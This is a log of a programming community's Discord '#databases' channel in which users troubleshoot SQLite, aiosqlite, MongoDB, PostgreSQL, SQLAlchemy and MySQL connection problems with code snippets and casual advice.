#databases
1 messages · Page 31 of 1
oh yeah yeah, my bad, should have shown all the schemas :P
Has anyone worked heavily with analytics storage and knows if there is an inherent gain to swap from MongoDB TimeSeries databases to PostgreSQL TimeSeries to be used as a data warehouse? We currently have everything stored in MongoDB anyway and Postgres isn't the most performant columnar OLAP storage system anyway, so I don't understand why we would bother migrating. Am I missing something here? I am struggling to find enough information to answer my exact questions or misunderstandings I guess. So I was hoping someone may have the information or experience here
Are you doing pure analytical (ie: read only?) or are struggling streaming time series to a db?
Trying to stream into a columnar store is not terribly efficient in general, one reason why time series db's even exist. I've heard of good results with timeseriesdb and Postgres, but haven't used it myself.
Does sqlite3 support asyncio or do I need an external library for that? If I do need a library, which ones do you recommend?
sqlite3 is considered a synchronous/blocking library, but because its a file-based database where network latency isn't involved (assuming you aren't using it over a network filesystem), simple queries like inserting a row or selecting a few rows on an indexed column can take very little time to execute and therefore not really "block" the event loop
in other cases where the database can be locked for long periods of time (from other concurrent connections), or where queries are complex to execute, sqlite3 would block until the query can be completed
if you aren't sure whether your use case isn't going to block, using an async wrapper like aiosqlite / asqlite would be a safer choice
https://aiosqlite.omnilib.dev/en/stable/
https://github.com/Rapptz/asqlite
imo i think asqlite has nicer defaults but aiosqlite is more widely known and also supported by sqlalchemy, if you plan on using an ORM
In that case me using asyncio would be more a case of dogmatic "all I/O operations are async" than actual need?
its very dependent on how connections will be interacting with the db
I do plan on using an ORM later, but I want to make absolutely sure I have a good handle on sql first. Never know when I'll need to use MyBatis and SpringBoot again...
I guess it really comes down to reminding myself: YAGNI applies to scaling too.
for example, sqlite locks aren't sophisticated enough to handle more than one concurrent writer, so just one connection that takes a while to commit some insert/update/delete query would keep the database locked
Transactions to sqlite dbs shouldn't take too long, though, and the bottlenecks will probably be network-based anyway. It isn't as if I am spinning up a container just for sqlite or anything.
Am I understanding correctly?
yeah, if you're diligent about keeping transactions short
WAL-mode also improves concurrency with reader/writer connections too
https://sqlite.org/wal.html
adds to Read Later storage.
I personally use postgresql
feel free to look at the source code too, internally they both proxy sqlite3 calls to a worker thread
How do i call a database in an if statement
like
If username in Database:
print("Success")
does anybody here do t levels course
cus i really need help asap
and the esp is soo close
starts tommorow
This should be trivial with any database driver or ORM you choose. If you don't know where to begin, try https://www.sqlitetutorial.net/sqlite-python/
I have no idea what a t levels course is or what it has to do with databases but if you need help with a Python question, grab a help channel #❓|how-to-get-help
header = {"Accept": "application/json", "apiKey": api_key}
data = {"dataSource": "Cluster0", "database": "CrownStudios", "collection": "BANS", "filter": {"text": "These are the stored banned ids for Low Poly FPS!"}, "update": {"$pull": {"bans": {1425085558}}}}
r = requests.post(data_api, json=data, headers=header)
print(r.json())
Whenever i used $pullAll, my code worked, but had no effect (1425085558 wasnt deleted from the array "bans") When i use $pull, it gives me this error
raise TypeError(f'Object of type {o.__class__.__name__} '
TypeError: Object of type set is not JSON serializable
But i never specified any set?
{1425085558} is a set
i changed it to an array, and it STILL isnt getting deleted
Also it's not really related to databases 
true but idk where else to put this
Or at least tell what api you're using
MongoDB's Data API
Why don't you use mongodb adapter/library?
It's a "list" in python
Hello everyone, what will be the best way to connect to mongoDB using pymongo if i have multi database structure for my project, like based on incoming request i have to choose which database to connect to. do i need to handle when to disconnect the previous connection anywhere?
I saw a lot of sqlite in this channel so I thought is mssql or any other database better? Or which one would you recommend?
sqlite is pretty decent usually. but it doesn't scale as well as mariadb or postgres for example
sqlite covers appropriate uses on their docs
https://sqlite.org/whentouse.html
in short, if it requires network access (client/server), high concurrency, or really big data, you'd want something different
That sounds like a very bad idea. Why would you do that?
i am very new to mongoDB so there might be issues with how i design my DB. So any help would be appreciated. here is basic over view of how my web app will be.
there will be different major org that will sign up, then different data will be stored in different collections, each org will have same type of fields but with different value. so i thought it will be better to store them in different DB. each org will have different DB in mongodb. so in every request i have a parameter that will define which org's db to connect.
so will it be better to store all of the data to one DB and differentiate org by unique value in collection's document?
Yea. That's normally how you do it. Also normally mongodb is a mistake. You want a relational db in 99% of cases.
ok, so what will be the favorable scenario where we can use mongoDB?
When you have very unstructured data or needs historical data where you want the data to be incompatible with the current code.
got it!
why doesn't this line insert into database? And I've checked tuple match_ups have values
here's my table
is this using the sqlite3 module? if so, did you commit after the insert?
hmm, what rows are already in the matches table? is there one with the same pair of players?
that seems fine, but im not sure about "just the columns match_no is in"
like you have player tuples already inserted but match_no is null for all of them?
I've inserted match_no before this line
cur.execute("delete from matches")
for i in range (player_count()-1):
data_results = [i+1]
data_matches = [i+1]
cur.execute("insert or ignore into results (match_no) values(?)", data_results)
cur.execute("insert or ignore into matches (match_no) values(?)", data_matches)```
that's my whole def
hmm, that seems like an odd query to do
to double check, what is the schema for your table? im assuming it's something like: sql CREATE TABLE matches ( match_no, player_1, player_2, PRIMARY KEY (player_1, player_2) );
player_1 and player_2 are both foreign keys
probably, doing two INSERT queries is meant to result in two separate rows rather than rows being merged into one
oh, i guess i misunderstood the key icons in your earlier screenshot
for clarification, this is what happens when the inserts are separate: sql sqlite> CREATE TABLE matches (match_no, player_1, player_2); sqlite> INSERT INTO matches (match_no) VALUES (1); sqlite> INSERT INTO matches (player_1, player_2) VALUES (1, 16); sqlite> SELECT * FROM matches; ┌──────────┬──────────┬──────────┐ │ match_no │ player_1 │ player_2 │ ├──────────┼──────────┼──────────┤ │ 1 │ NULL │ NULL │ │ NULL │ 1 │ 16 │ └──────────┴──────────┴──────────┘
mhm
Is there any good platform that is fairly cheap monthly as a service that help visualize a database or any public repository doing something similar, I'd like to be able to edit database via a frontend application
There are a lot of tools that help visualize database schemas in one way or another... This is one of the more interesting free ones I've seen: https://dbdiagram.io/home
Normally you can set it up so you can connect to it and use any tool you want. I like TablePlus for postgres, and SequelAce for mysql.
I recently got into sqlalchemy coming from django, and I must say I'm still confused as to whether or not use the sessionobject with .add(), .delete() and .update(), or instead just opt for the insert(), update(), delete() from the core.
What are your experiences? It seems like in sqlalchemy 2.0 select() is used regardless.
But for create/update/delete-endpoints I struggle to decide what to use.
I would use .add(), .delete(), and .update() from the orm because it's more pythonic,
me during data engineer interview: spark transformation? catalyst optimizer? yeah I know what they mean!
me after 1 year as data engineer: holy fck this means that? oh no that did not mean this? but wait that didn't work like....oh no.
good god this hits like a truck
Is this a place I can ask about web scraping (ethical)
I'm new to aiosqlite recently shifted from SQLite3, is it right to connect db in every command because SQLite3 allowed only one connection
@commands.command()
@commands.guild_only()
async def addtag(self, ctx, tag_name, *, tag_text):
tagdb = await aiosqlite.connect("tagData.db")
await tagdb.execute("INSERT OR ROLLBACK INTO taggingData (guild_id, user_added, tag_name, tag_text) VALUES (?,?,?,?)", (ctx.guild.id, ctx.author.id, tag_name, tag_text))
await tagdb.commit()
embed=discord.Embed(title=".addtag", color=0x000000)
embed.add_field(name="Status:", value="Added", inline=False)
embed.add_field(name="Name:", value=tag_name, inline=False)
embed.add_field(name="Text:", value=tag_text, inline=False)
await ctx.send(embed=embed)
@commands.command()
@commands.guild_only()
async def tag(self, ctx, tag_name):
tagdb = await aiosqlite.connect("tagData.db")
async with tagdb.execute("SELECT user_added, tag_text FROM taggingData WHERE guild_id = ? AND tag_name = ?", (ctx.guild.id, tag_name)) as cursor:
async for tagvar in cursor:
user_added, tag_text = tagvar
user_name = ctx.guild.get_member(user_added)
embed=discord.Embed(title=f".tag {tag_name}", description="", color=0x000000)
embed.add_field(name="Text:", value=tag_text, inline=False)
embed.add_field(name="Added:", value=user_name.mention, inline=False)
await ctx.send(embed=embed)
Yeah I'm beginning to understand more. It seems like the ones from the core are mostly used for bulk inserts/updates 🙂
Using sqlite3, Python 3.11.5, Windows Server 2022.
try:
with sqlite3.connect(DATABASE_PATH) as conn:
cur = conn.cursor()
cur.execute("SELECT * FROM user_data WHERE discord_id = ?", (user_id,))
if cur.fetchone() is None:
cur.execute("INSERT INTO user_data (discord_id) VALUES (?)", (user_id,))
cur.execute("UPDATE user_data SET game_name = ?, whitelisted = 1 WHERE discord_id = ?", (gamertag, user_id))
conn.commit()
await ctx.send(f'Whitelist request approved for {user_id}.')
except sqlite3.Error as e:
await ctx.send(f'Database error: {e}')
Keep getting this error exactly: Database error: unable to open database file. Unsure as to what the cause of this is.
Does DATABASE_PATH exist? Does your program have write access?
Yes, and I am not sure, never had to set that up before, how would I?
Check Windows file permissions, etc.
Still getting the database error.
did you make any recent changes to DATABASE_PATH? and can you verify that the database path exists from inside your command? i.e. py import os print(os.path.exists(DATABASE_PATH))
yes, the advantage of multiple connections is being able to process multiple transactions concurrently, versus one connection which can't be concurrently used with more than one transaction (if you don't put a lock around your connection, two commands might attempt to perform queries in the same transaction which effectively breaks atomicity/isolation of transactions for your app)
technically you can use multiple connections with sqlite3 too, but since asyncio is single-threaded, it's easier to accidentally cause deadlocks/connection timeouts without a wrapper like aiosqlite to make it asynchronous
sidenote, you should use a context manager to close your connection properly: py async with aiosqlite.connect(...) as conn: ...
Comes back false.
hmm, i would guess one of the directories in your path wasnt yet created
connection = sqlite3.connect("C:\\Server\\The-MP\\rmc.db")
I am using an absolute path though so I don't understand why it isn't finding it or doesn't have access.
are you running your bot from the same user account? if so, are you able to access Server/The-MP/ without any permission issues?
well ig if you know that the file definitely exists then your user account prob has the permissions as normal
so just the first question then
Yes, it is created and there, more so I opened it up and it is good.
how are you running your bot?
ok, should be same user then...
Tried both in Administrator mode and not in Administrator mode.
Yeh, it's boggling my mind but I bet it is something completely obvious.
definitely no typos?
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
Here is the main.py
It is having the same error in there as the one in my cogs.
I AM AN IDIOT
I PUT A DASH in the name of TheMP 
🙃
Thank you for asking me that question though as that is what made me double check the path 🤣
The computer is right, the monkey brain is confused. This is my most hard won core belief after coding for... eh. 30 years?!
100%, though monkeys are a bit smarter, they ‘ve chosen life in nature
Only smart short term. Like the expression goes: "Asteroids are natures way of saying Hey how's that space program going?"
I guess we’ve to ask to the ones still floating around
anyone familiar with regression models?
Yes, but just ask the question plz. Lots of people are. * Also, probably better to ask your question in #data-science-and-ml
sorry
any good IDE for SQL?
datagrip, if not u can always open a .sql file in vscode
what about SQL workbench?
yep thats pretty nice too
okay thanks
DBeaver is a popular and free option. The interface is a bit ugly but it's pretty feature rich and supports a wide range of DB engines
If you don't need all those special DB features though, any IDE will do
i enjoy Beekeper studio, it works okay across all databases
except it is not able to hand postgresql db with 1000+ schemas... may be Dbeaver can actually
i use in those cases the native PgAdmin
if i have a column for storing yes/no status in sql, which one should i use?
- Yes, No
- YES, NO
- 1, 0
- Y, N
Depends on the database, really - e.g. sqlite has a bit of native support for it (it uses 1 and 0): https://sqlite.org/datatype3.html#boolean_datatype
and postgresql has more.
Can someone help me figure out why this SQL query isn't working properly?
query = "SELECT * FROM events WHERE playerone_steamid = :steamid OR playertwo_steamid = :steamid AND date = '%:date%'"
specifically the "date" part
placeholders in strings arent considered placeholders so perhaps you want to || concatenate the percent characters onto it instead: sql '%' || :date || '%' but that seems like an odd thing to do for a plain = equality check on a date...
my database has dates that are like:
[2024-05-10....] So Im basically only after the first bit the year month and day. I dont need the exact time
So im after anything that's "like" a specific date.
Should I change the "date = " to be "date LIKE"?
it feels like parsing the datetime out of the string would be a more reliable choice... but i guess thats fine
I need the full datetime
Im using the full timestamp as a way to determine if an entry is already in my database.
is this for an sqlite database? i wonder if LIKE matching can use indexes for matching prefixes...
as there shouldnt be any entries with the exact same timestamp
aiosqlite
This is what my entries look like
I also figured out my issue lol. My numbers didnt have a 0 at the start if it was less than 10
but i also adjusted to what you suggested
oh and a sidenote, AND binds more tightly than OR does, so this expression would get evaluated as: sql (playerone_steamid = :steamid) OR (playertwo_steamid = :steamid AND date = '%:date%')
I thought it'd work a lot like an IF statement in python?
Where it'd check if playerone_steamid or playertwo_steamid is equal to what I asked and the date for either one was equal to what I submitted
the operator precedence matches python too
Coz in this function, the steamid i am submitting could be in either column
Would this be better then?
query = "SELECT * FROM events WHERE date LIKE '%' || :date || '%' AND (playerone_steamid = :steamid OR playertwo_steamid = :steamid)"
```?
!e ```py
print(True or True and False)
= (True) or (True and False)
= True or False
= True```
@waxen finch :white_check_mark: Your 3.12 eval job has completed with return code 0.
True
ya thatd work
Alright. Sweet. Learnt something new, both in pytho and sql :D
<Final Fantasy Victory Music Plays>
hmm, there is a documented optimization for LIKE:
https://sqlite.org/optoverview.html#the_like_optimization
im not sure i understand what it's saying, but presumably if the schema looked like: sql CREATE TABLE mytable ( ..., date TEXT ); CREATE INDEX ix_mytable_date ON mytable (date); then sqlite could perform an optimized range scan for certain patterns where only a prefix is needed to match, for example to list all rows from a particular day: sql SELECT * FROM mytable WHERE date LIKE '[2024.05.10%';
https://paste.pythondiscord.com/SWAA the tables/collumns and login data are correct yet still wont upload to db
Isn't mysql using %s instead of ? for the parameter binding? Any error?
thats what i thought but someone else who def knows more than me said its ?
Which module do you use for the database?. It should be in the description/example code.
Have you tried putting invalid sql in there and see that you get the error log?
i tried both %s and ? and no difference
What happens with total garbage in the SQL?
insert_into_table = ("INSERT NOPE THIS WILL NOT WORK INTO ai_messages (
like that.
Just for completeness: the mariadb module uses ? for binding parameters by default but also supports %s to be mysql compatible.
hey guys, btw, I need a guest writer for my article where I share things like cybersecurity/coding/ML&AI, please dm if interested.
https://pastebin.com/SVeS1L1i so for whatever reason the process function takes about a minute to finish despite the yields looking like they take not even a second to finish. Could it possibly be some connection hang or something?
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
Are there any other sql functions, besides newid() that can be used as a seed for rand() to get a new random value for each row?
Row_number for example?
Depends what SQL. I know Postgres has getguid()
Hello guys 👋🏻 ,
could someone please help me with the Backtesting.py libary and
it´s data processing. I tried to do it myself but i failed a lot, it always has the same error. Please Dm me if you could help me further.
hey, ive recently gotten back into coding and im working on sqlite3 databases. is there a way to check if a row exists in a database and if it does return true/false or 1/0 or anything like that? i cant find anything online so would appreciate the help
im aware this is prob super simple but yeah
having 2 tables like this, say a room has been booked for 25-28 may and i wanted to boook for 21 (today) - 26 may. How can the database know that the room has been booked for my date range even though its technically still available for today?
You'll have to SELECT WHERE to look for rows that fit the criteria, then see if you get any results back or an empty response
There's a PHP Developers server listed on Disboard
What are the drawbacks (if any) of hosting a SQLite3 database on a shared local network?
how would you "host" it? it does not include a server
sqlite doesnt really have built-in access control like e.g. postgresql has, and databases like postgres are built for multiple users to use them at the same time
I believe you can point to files directly on a shared drive. It's been a while since I had to work with one.
https://www.sqlite.org/faq.html#q5
SQLite uses reader/writer locks to control access to the database. (...) But use caution: this locking mechanism might not work correctly if the database file is kept on an NFS filesystem. This is because fcntl() file locking is broken on many NFS implementations. You should avoid putting SQLite database files on NFS if multiple processes might try to access the file at the same time.
Alright, thank you.
Check the ends
Hello, if anyone is active
as of right now, I am trying to connect to MEGA through the python mega.py API
However, I am running this script through java
Here is my error:
File created: UnitledFile.txt
Traceback (most recent call last):
File "C:\Users\Family\Desktop\OpenLibrary\MegaUpload.py", line 1, in <module>
mega = Mega()
^^^^
NameError: name 'Mega' is not defined
Python script executed successfully
You're in the wrong channel and you didn't show your code, but it looks like you didn't import Mega. Check their documentation and if you're still stuck then share your code in a help channel #❓|how-to-get-help
Is it someone else's script? You may need to contact the developer
Ok
never
it was always my code
lol
Hi,
I have a postgresql 14 database on a vps (Ubuntu 22) and I constantly run into the problem that it sometimes just stops working
then I have to run the following command sudo systemctl restart postgresql.service
and then my db starts working again
now recently it happened again
but after running sudo systemctl restart postgresql.service
all my tables just dissappeared
anyone an idea what could cause smth like this?
This is the journalctl
It crashed while doing queries shown in the following code
pol_scraper = PolygonScraper()
conn = pg.connect(
"dbname=postgres user=postgres password=mypw host=myhost port=5432"
)
cur = conn.cursor()
max_block = pol_scraper.web3.eth.block_number
# max_block = 57063842
for i, ((block, transaction_hash), transfer) in tqdm(enumerate(pol_scraper.get_all_data(0, max_block))):
# print(block)
# print(transfer['value'])
try:
cur.execute(
"""
INSERT INTO polymarket_transfers (type, token_address, sender, receiver, token_id, transfer_event, value, transaction_hash, block_number)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s) ON CONFLICT DO NOTHING""",
(
transfer['type'],
transfer['token_address'],
transfer['from'],
transfer['to'],
transfer['token_id'],
transfer['transfer_event'],
transfer['value'],
transaction_hash,
block
),
)
conn.commit()
if i % 5000 == 0:
print(f"Last trade: {transaction_hash}, {block}")
except Exception as e:
print(e)
print(transaction_hash)
print(transfer)
Purely out of curiousity: I am currently using sqlite3 for one of my applications, would it be quicker by any amount if I took all data from a column, converted it to a .txt/.xml/.json or, stored all of the data and stored it in a variable and make checks against the data that way?
usually doing operations against data in memory is faster than against data in disk
as far as speed goes, it depends on which operations you're doing.
Reading the entire data and turning it into a dictionary? JSON may be faster if it is already formatted how you want it
Calculating an aggregation over an entire column, or finding something in a huge table that has an index? Databases should be way faster
Hi, does anybody here have experience with sqlalchemy and azure app service(first time for me) and setting up a db connection? Can't get it to work and its frustrating hah
sqlalchemy.exc.OperationalError: (pyodbc.OperationalError) ('HYT00', '[HYT00] [Microsoft][ODBC Driver 17 for SQL Server]Login timeout expired (0) (SQLDriverConnect)')
This is the error in my log file but I have everything setup correctly afaik
Anyone any ideas?
What does the config look like?
import logging
import os
from dotenv import load_dotenv
from sqlalchemy import MetaData, create_engine, URL
from sqlalchemy.orm import sessionmaker
# Load environment variables
load_dotenv()
# set up logging
logging.basicConfig(level=logging.INFO)
# Database url
url_object = URL.create(
"mssql+pyodbc",
username=os.environ.get("UID"),
password=os.environ.get("PWD"),
host=os.environ.get("HOST"),
port=os.environ.get("PORT"),
database=os.environ.get("DATABASE"),
query={
"driver": "ODBC Driver 17 for SQL Server",
"Encrypt": "yes",
"TrustServerCertificate": "no",
"Connection Timeout": "60"
}
)
try:
engine = create_engine(url_object) # connection with database
logging.info("Connected to the database")
except Exception as e:
logging.error("Could not connect to the database")
logging.error(e)
raise
It works locally
are you running any docker files?
maybe you're giving invalid credentials because it says login timeout expired
That would be weird because everything works locally
And I use the same credentials...
What do you mean locally if you're connecting to a cloud server?
That the connection locally works with the sql server
By starting up the back-end server
fastapi/uvicorn
You are connecting to a server that is open to the internet?
hey, I am terrible at SQL, need to get good. Can I have you best advice please?
thank you
no problem
I want to webscrape IMDB top 1000 movie subtitles to classify them using NLP. Any suggestions as to how to proceed. There are permissions issues I am running into. I'd also be ok with using a dump of these files. Thank you.
Imdb has downloads for the db
hey guys! quick question i have been using pandas in my project, where i fetch data from an api every x time, save it and manipulate it. recently just got interested in sql and i think it will be better for me to use sqllite instead of pandas, if anybody has advice in this topic will be much appreciated
You can use both. Pandas can read_sql.
So i can manipulate the same db with both. Good to know thanks
I'm trying to learn numpy, anybody know any good tutorials out there to learn from?
Numpys docs are pretty good: https://numpy.org/doc/stable/user/absolute_beginners.html
will check out, thanks
:incoming_envelope: :ok_hand: applied timeout to @fiery rivet until <t:1716752044:f> (10 minutes) (reason: duplicates spam - sent 4 duplicate messages).
The <@&831776746206265384> have been alerted for review.
someone teach this man about f strings 😭
f-strings came with python 3.6 which was released Dec. 23, 2016
oh damn I did not know that
String formatting in SQL gives me the creeps
As I am new here, I'm a bit lost. I'm one of the developers of a "new" database and we would like to get feedback from Python developers without spamming you. However, I did not find a good channel for that (like e.g. "show your work")... Is there a appropriate way?
I mean.. I think it's fine to post it with that kind of sentiment.
OK, great, so here's GitHub: https://github.com/objectbox/objectbox-python
Although I like the example in this post better: https://objectbox.io/python-on-device-vector-and-object-database-for-local-ai/ (also comes with links to e.g. Colab)
Again, any feedback is appreciated!
spelling error on https://objectbox.io/ securly. You should really run the entire text though a spell checker. I recommend using a mac which has spell checker everywhere :P
😂 Noted, passing on that feedback...
The query examples on the homepage for other languages seem to have more complex examples for querying. You should match that in the python readme imo.
For now, I updated the section to also link to the example folder, which contains more examples beyond CRUD. Thanks again.
guys
:incoming_envelope: :ok_hand: applied timeout to @civic topaz until <t:1716926662:f> (10 minutes) (reason: duplicates spam - sent 4 duplicate messages).
The <@&831776746206265384> have been alerted for review.
for defining an entity maybe more of a syntax closer to data classes where we would just typehint the attribute with relevant types and u parse it internally Annotated might be cool for this? also id can probably be implicit as well considering its being redefined everywhere in user classes
Thanks for the feedback! Closer to data classes was also on our wish list, but we where lacking "nice decorators" for attributes. Not sure we came across Annotated yet. The thing is that ObjectBox has more types internally, so an int could be in the Int8-Int64 range. How would you model number: Int32 instead? number: Annotated[int, Bits(32)] would be an option, but it feels rather long-winded?
u could do something like Annotated[int, ..., 32] ig or perhaps define a few custom wrappers like IntRange[..., 32] there are a few ways u could go about this in python ig
u could override __class_getitem__
to add some implementation specific validation
If I understand correctly, I could also have a custom wrapper like Int32[int] (by subclassing Annotation, I guess?). The next step would be get rid of the int part to end up with Int32?
a quick example btw could be something like this
if typing.TYPE_CHECKING:
from typing import Annotated as IntRange
else:
class IntRange:
def __init__(self, annotation, lower_bound, upper_bound):
...
def __class_getitem__(cls, obj):
# perform parsing and validation here and return a class instance
return cls(*obj)
now internally u can convert this intrange to ur wrappers like int32 64 128 etc
number: IntRange[int, ..., 32]
when its not in run time it would just be annotated from typing
and when its running the if condition would be false and it would be IntRange wrapper class containing relevant metadata
which u could use in ur entity decorator to process
Hi, I have a question about suitable use cases of JSON column type , similar to this reddit thread .
For example , in an e-commerce application :
- I need to store a list of emails and phone numbers (nation code and numbers) for an client's order to a relational database
- the emails and phone numbers are not the key or index for every query in the app
- the emails and phone numbers (for each order) are read at low frequency
- e.g. once every few days
- the application has permission model which constraints maximum number of emails for each client's order,
- e.g. at most 3 emails and 2 phone numbers when client creates a new order.
Does JSON column type make sense in such case ?
appreciate any feedback , thanks.
Feels like a shortcut? How will this age; e.g. do you know that an index is never needed in the future? And which DB are we talking about?
Thanks so much for your efforts! I'll discuss this approach with the team.
Feels like a shortcut?
yes , my question is about Relational (SQL) database .
Typical database schema design is to create one table for basic info (e.g. customer name, total price) , separate tables for order lines and contact emails ...etc. , and then link them by setting up referential keys .
But I was thinking whether it is appropriate to design with a single column that persists structured data (in my case, it is JSON value in emails field containing all emails related to an order) .
do you know that an index is never needed in the future?
yes, the index on the email field is never needed
And which DB are we talking about?
Relational (SQL) database like MariaDB or PostgreSQL
It's a shortcut that leads to quick results and may potentially be regretted in the future. You are skipping the relational structure, so it is not optimal for a relational database. How well it works obviously depends on the JSON functionality of the specific DB you are using. A classic trade-off...
u would kind of be forgoing atomic properties of ur db that way normalisation would be a far better alternative imo
:incoming_envelope: :ok_hand: applied timeout to @manic star until <t:1716992616:f> (10 minutes) (reason: duplicates spam - sent 4 duplicate messages).
The <@&831776746206265384> have been alerted for review.
I am not sure how the JSON-column approach could forgo atomic property , but yes that does not satisfy normalisation (probably 1NF)
it's not possible to change only one part of the json data, you need to rewrite the entire thing
sent_friends = relationship('Friends', foreign_keys='Friends.sender', back_populates='sender_user')
received_friends = relationship('Friends', foreign_keys='Friends.receiver', back_populates='receiver_user')
sender_friends: AssociationProxy[List["Users"]] = association_proxy('received_friends','sender_user')
receiver_friends: AssociationProxy[List["Users"]] = association_proxy('sent_friends', 'receiver_user')```
I'm using an association proxy and would like to know how to load the sender_friends and receiver_friends proxy relationship.
hey this is probably a dumb question but i haven't found an answer yet is there a way to add the table you want to use in sqlalchemy's create_engine or just into the db url?
Is this what you're asking? https://stackoverflow.com/questions/19175311/how-to-create-only-one-table-with-sqlalchemy
user = await db.execute(
select(Users).options(selectinload(Users.sender_friends), selectinload(Users.receiver_friends),
selectinload(Users.dms))
.filter(Users.username == current_user_username))
sender_friends: AssociationProxy[List["Users"]] = association_proxy('received_friends','sender_user')
receiver_friends: AssociationProxy[List["Users"]] = association_proxy('sent_friends', 'receiver_user')```
sqlalchemy.exc.ArgumentError: expected ORM mapped attribute for loader strategy argument
Why am I getting this error when loading an association proxy?
Show the full error
Assign an index to your data: eg:
subjects = {"Alice": 0, "Bob": 1}
predicates = {"knows": 0, "works_at": 1, "lives_in": 2}
objects = {"Bob": 0, "CompanyX": 1, "CityY": 2}
Convert to vectors:
triples = [
(subjects["Alice"], predicates["knows"], objects["Bob"]),
(subjects["Bob"], predicates["works_at"], objects["CompanyX"]),
(subjects["Alice"], predicates["lives_in"], objects["CityY"])
]
Create training dataset:
import numpy as np
def one_hot_encode(index, size):
vec = np.zeros(size)
vec[index] = 1
return vec
num_subjects = len(subjects)
num_predicates = len(predicates)
num_objects = len(objects)
X = []
for (s, p, o) in triples:
s_vec = one_hot_encode(s, num_subjects)
p_vec = one_hot_encode(p, num_predicates)
o_vec = one_hot_encode(o, num_objects)
X.append(np.concatenate([s_vec, p_vec, o_vec]))
X = np.array(X)
the dude who gave me this assignment said this might help to make the triple database useable
he told me to use the rephraser library and idek whats that
Hey guys,
Is there any way to export dataframe to excel faster like within 5 mins
I have tried to export data of 1000000 from dataframe to excel using to_excel along with the engine xlsxwriter it takes around more than 10 mins unlike CSV it export within a min
Is there any way to export with in a 10
Using threading or any memory
Any suggestions if you have
You know that excel has a max row count of 1,048,576 right? If you are close to that limit, you might want to reconsider your approach.
Yeah I have planned to use batch processing and threading like divide the dataframe into chunks and writing multiple chunks in same excel file parallelly
No I mean reconsider like not trying to write an excel file at all
but that's the client requirement they need as excel file
Maybe your job now is to explain to the client why this is a bad idea. The quote is "the customer is always right, in matters of taste". This is a matter of technology, not taste.
If your data grows beyond the limit that plainly will not work.
Hi Guys
I wondered if someone might be able to help
I am getting an error when trying to load a bing maps API on SQL reporting online however when I do this the map does not fully load. the error is being displayed when viewing the report on our report site Local Customer Mapping - SQL Server 2019 Reporting Services, The error is the request was aborted could not create SSL/TLS Secure Channel
This is not a database issue. There's an issue with TSL setup, like it clearly says. Maybe you have corporate spyware installed that man-in-the-middles the TLS?
Yea I don't understand that, but at least someone who knows some SQLAlchemy maybe can help now. The error message is pretty bad I must say.
Yeah it's a disgusting error.
After trying to configure relationships in sqlalchemy, I really don't see a reason to use one if I can just query the relationships using joins.
Heh. Another glowing review of the ease of use of sqlalchemy 🤣
i recently installed postgres and went thru a guide on how to get templet1 set up. I cant seem to login to the postgres user even though i set it to something super simple
:incoming_envelope: :ok_hand: applied timeout to @torn sphinx until <t:1717224649:f> (10 minutes) (reason: duplicates spam - sent 5 duplicate messages).
The <@&831776746206265384> have been alerted for review.
You can't use loading with association proxy
I fixed the problem.
I ended up not needing an association proxy but a chain of loaders.
Hello, I have a problem that I've had for a very long time in my Discord bot in Python 3.11. Basically I have a Discord bot command that allows me to get data, everything works fine but after a few hours it disconnects from the database, I think I've coded everything correctly so that the cursor closes properly and there is a single connection for the whole Discord bot.
I don't have this problem in my infrastructure with other languages, it's specific to the bot.
What's the problem in my code? I'm using a MariaDb 8.0 database with the latest version of mysql.connector.
Thanks in advance for your help!
_connection = None
@classmethod
def connect(cls):
if cls._connection is None:
cls._connection = mysql.connector.connect(
host=sql_ip,
user=sql_Username,
password=sql_mdp,
database=sql_nom
)
@classmethod
def disconnect(cls):
if cls._connection is not None:
cls._connection.close()
cls._connection = None
@classmethod
def get_connection(cls) -> mysql.connector.connection:
cls.connect()
return cls._connection```
async def discord_linked_from_id(self, discordId) -> dict:
cur = Database.get_connection().cursor(dictionary=True)
try:
Database.get_connection().commit()
cur.execute("SELECT status, playername, uuid FROM player WHERE discordid = %s LIMIT 1", (discordId,))
data = cur.fetchall()
cur.close()
if data:
return data[0]
else:
return False
except:
cur.close()
return False```
Have you tried seeing if there was an exception? It seems like you don't have it where you print the exception.
No, because I have a strange code with python to load the cogs asynchronously and I don't have the errors in my codes
You have an exception handler that closes the connection but doesn't print out an error.
except:
cur.close()
return False```
Yes I had done it before in this code it is not there but I had no error, I say it all works just it does not respond a few hours later and I have this problem that on this bot
@wise wind
Is there anything wrong with my request? Surely the problem is with the User class, not the connection?
does cur.close() close the connection?
Well, I don't know about the cursor of the request?
Is this all your code? I feel like there's a lot more code along side this.
which could have the potential error
Ok wait
async def discord_linked(self, minecraftName) -> bool:
cur = Database.get_connection().cursor(dictionary=True)
try:
Database.get_connection().commit()
cur.execute("SELECT discordid, status FROM player WHERE playername = %s LIMIT 1", (minecraftName,))
data = cur.fetchall()
cur.close()
if data:
return data[0]
else:
return False
except:
cur.close()
return False
async def minecraftName_to_uuid(self, minecraftName) -> str:
cur = Database.get_connection().cursor(dictionary=True)
try:
Database.get_connection().commit()
cur.execute("SELECT uuid FROM player WHERE playername = %s LIMIT 1", (minecraftName,))
data = cur.fetchall()
cur.close()
if data:
return data[0]
else:
return False
except:
cur.close()
return False
async def bedwars_data(self, minecraftName) -> dict:
cur = Database.get_connection().cursor(dictionary=True)
try:
Database.get_connection().commit()
cur.execute("SELECT * FROM bedwars WHERE playername = %s LIMIT 1", (minecraftName,))
data = cur.fetchall()
cur.close()
if data:
return data[0]
else:
return False
except:
cur.close()
return False
The rest of the codr
how do you call the User class?
Make sure to print out the exceptions. I know you say you have but I don't see you doing that with this code.
except Exception as e:
print(e)```
for example
Tell me the problem brother
new User().myfunc()
Idk how I could test the code out.
I have brother send me this code
class Database:
_connection = None
@classmethod
def connect(cls):
if cls._connection is None or not cls._connection.is_connected():
try:
cls._connection = mysql.connector.connect(
host=sql_ip,
user=sql_Username,
password=sql_mdp,
database=sql_nom
)
except Error as e:
logging.error(f"Error while connecting to MySQL: {e}")
cls._connection = None
return cls._connection
@classmethod
def disconnect(cls):
if cls._connection is not None and cls._connection.is_connected():
cls._connection.close()
cls._connection = None
@classmethod
def get_connection(cls):
return cls.connect()
class User:
async def discord_linked_from_id(self, discordId) -> dict:
conn = Database.get_connection()
if conn is None:
logging.error("Failed to get database connection")
return False
cur = conn.cursor(dictionary=True)
try:
cur.execute("SELECT status, playername, uuid FROM player WHERE discordid = %s LIMIT 1", (discordId,))
data = cur.fetchone()
